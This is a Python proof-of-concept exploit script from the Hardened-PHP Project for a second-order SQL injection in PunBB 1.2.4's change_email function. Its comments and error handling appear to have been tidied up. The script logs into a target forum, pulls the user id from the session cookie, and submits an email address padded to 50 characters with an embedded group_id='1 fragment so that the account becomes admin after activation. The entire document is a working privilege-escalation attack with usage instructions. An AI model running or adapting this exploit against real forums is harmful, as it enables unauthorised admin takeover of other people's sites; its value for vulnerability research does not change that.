
PunBB <= 1.2.4 - change email to become admin exploit



#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
#                           -= PunBB 1.2.4 =-
#                   change_email SQL injection exploit
#
#  user-supplied data within the database is still user-supplied data
#
#######################################################################

import urllib
import getopt
import sys
import string

# Module-level alias for the raw argument vector; main() only reads its
# length to decide whether enough options were supplied before parsing them.
__argv__ = sys.argv

def banner():
    """Print the tool name and the copyright line to stdout.

    The second line ends with an extra newline, so a blank line follows
    the banner in the terminal.
    """
    lines = (
        "PunBB 1.2.4 - change_email SQL injection exploit",
        "Copyright (C) 2005 Hardened-PHP Project\n",
    )
    for line in lines:
        print(line)

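def usage():
    """Print the banner and the option summary to stdout, then exit with -1.

    All five options are mandatory; main() calls this on a getopt error or
    when fewer than ten arguments were supplied.  Never returns.
    """
    banner()
    print("Usage:\n")
    print("   $ ./punbb_change_email.py [options]\n")
    print("        -h http_url   url of the punBB forum to exploit")
    print("                      f.e. http://www.forum.net/punBB/")
    print("        -u username   punBB forum useraccount")
    # NOTE: a password given on the command line is visible to every local
    # user through the process list and usually ends up in shell history.
    print("        -p password   punBB forum userpassword")
    # These two help lines were split in the middle of their string literal
    # in the original listing (a syntax error); they are one line each.
    print("        -e email      email address where the admin level activation email is sent")
    print("        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails")
    print("")
    sys.exit(-1)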

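def main():
    """Log in to the target PunBB 1.2.4 forum and submit the crafted address.

    All five options are required and are read from sys.argv via getopt:

        -h  base URL of the forum (e.g. http://www.forum.net/punBB/); a
            missing trailing slash is tolerated
        -u  forum user name
        -p  forum password -- NOTE: a command-line password is visible to
            every local user via the process list
        -e  address that should receive the activation mail
        -d  catch-all domain; the final '"@domain' suffix is attached to the
            crafted address so that it still looks like a mail address

    Flow: POST the credentials to login.php, pull the user id out of the
    session cookie PunBB hands back, then POST the crafted address to
    profile.php?action=change_email for that user.  The crafted address
    carries a SQL fragment (group_id='1 -- the admin group, per the
    script's stated goal) after a quoted local part, padded so that the
    part before the trailing '"@domain' is exactly 50 characters.
    Presumably 50 is the width of the column the pending address is stored
    in, so the suffix is truncated away on storage and the fragment is
    later re-used unescaped by the activation code ("user-supplied data
    within the database is still user-supplied data") -- confirm against
    the 1.2.4 source before relying on the exact layout.

    Exit codes: -1 for usage/validation errors or failed HTTP requests, -3
    when no session cookie came back or it did not contain a user id.
    Returns None.  Credentials and the session cookie travel in clear text
    unless the forum URL is https.
    """
    try:
        opts, _args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
    except getopt.GetoptError:
        usage()

    # Five options, each with an argument, plus argv[0].
    if len(__argv__) < 10:
        usage()

    host = username = password = email = domain = None
    for opt, value in opts:
        if opt == "-h":
            host = value
        elif opt == "-u":
            username = value
        elif opt == "-p":
            password = value
        elif opt == "-e":
            email = value
        elif opt == "-d":
            domain = value

    banner()

    # Every option is mandatory; report the first one that is missing.
    required = (
        (host, "[-] need a host to connect to"),
        (username, "[-] username needed to continue"),
        (password, "[-] password needed to continue"),
        (email, "[-] email address needed to continue"),
        (domain, "[-] catch all domain needed to continue"),
    )
    for value, message in required:
        if value is None:
            print(message)
            sys.exit(-1)

    # URLopener needs an explicit scheme; anything else is treated as a
    # local path rather than a web request.
    if not (host.startswith("http://") or host.startswith("https://")):
        print("[-] host must be an http:// or https:// URL")
        sys.exit(-1)
    # Normalise the base URL so both requests target the same directory.
    # (The original prefixed login.php with '/' but profile.php without one,
    # which broke whenever the URL was given without a trailing slash.)
    base = host.rstrip("/") + "/"

    # Step 1: log in with the supplied credentials to obtain a session cookie.
    params = {
        'req_username': username,
        'req_password': password,
        'form_sent': 1,
    }
    wclient = urllib.URLopener()
    print("[+] Connecting to retrieve cookie")
    try:
        req = wclient.open(base + "login.php?action=in", urllib.urlencode(params))
    except IOError:
        # URLopener raises IOError for network failures and non-2xx replies;
        # report instead of dumping a traceback.
        print("[-] Login request failed: %s" % (sys.exc_info()[1],))
        sys.exit(-1)
    info = req.info()
    if 'set-cookie' not in info:
        print("[-] Unable to retrieve cookie... something is wrong")
        sys.exit(-3)
    # Keep only the name=value part of Set-Cookie.  The original
    # find()-based slice silently dropped the last character whenever the
    # header carried no ';' at all.
    cookie = info['set-cookie'].split(';', 1)[0]
    print("[+] Cookie found - extracting user_id")

    # The cookie value is URL-encoded; the user id is expected between
    # %3A%22 (':"') and the following %22%3B ('";').  Validate both markers
    # instead of slicing on a -1 from find().
    start = cookie.find("%3A%22")
    end = -1
    if start != -1:
        end = cookie.find("%22%3B", start + 6)
    if start == -1 or end == -1:
        print("[-] Cookie does not look like a PunBB session cookie: %s" % cookie)
        sys.exit(-3)
    user_id = cookie[start + 6:end]
    if not user_id.isdigit():
        print("[-] Extracted user id is not numeric: %r" % user_id)
        sys.exit(-3)
    print("[+] User-ID: %d" % int(user_id))
    # Every further request through this opener carries the session cookie.
    wclient.addheader('Cookie', cookie)

    # Step 2: build the crafted address.
    if '@' not in email:
        print("[-] email address must contain an @")
        sys.exit(-1)
    # Split on the first '@', exactly like the original find()-based slices.
    local_part, mail_domain = email.split('@', 1)
    # '"local"@domain,"',' -- the closing quote ends the SQL string literal
    # the address is later embedded in; group_id='1 then reads as a second
    # SET clause.
    payload = '"' + local_part + '"@' + mail_domain + ',"\','
    append = 'group_id=\'1'
    padding = 50 - len(append) - len(payload)
    if padding < 0:
        # The layout relies on the 50-character boundary; a longer address
        # pushes the SQL fragment past it and the request will most likely
        # not have the intended effect.  Same (unpadded) payload as before,
        # but say so instead of failing silently.
        print("[!] warning: -e address is %d characters too long for the payload" % -padding)
        padding = 0
    payload = payload + (' ' * padding) + append + '"@' + domain

    # Step 3: submit the address change for the logged-in user.
    params = {
        'req_new_email': payload,
        'form_sent': 1,
    }
    print("[+] Connecting to request change email")
    try:
        wclient.open(base + "profile.php?action=change_email&id=" + user_id,
                     urllib.urlencode(params))
    except IOError:
        print("[-] change_email request failed: %s" % (sys.exc_info()[1],))
        sys.exit(-1)
    print("[+] Done... Now wait for the email. Log into punBB, go to the link in the "
          "email and become admin")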

# Script entry point: run the exploit only when executed directly, so the
# module can be imported without sending any requests.
if __name__ == "__main__":
    main()